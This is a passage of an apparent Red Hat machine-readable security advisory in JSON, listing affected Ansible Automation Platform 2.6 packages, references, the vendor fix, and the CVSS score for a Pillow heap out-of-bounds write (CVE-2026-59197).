"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Native heap out-of-bounds write"
},
{
"cve": "CVE-2026-59885",
"cwe": {
"id": "CWE-1050",
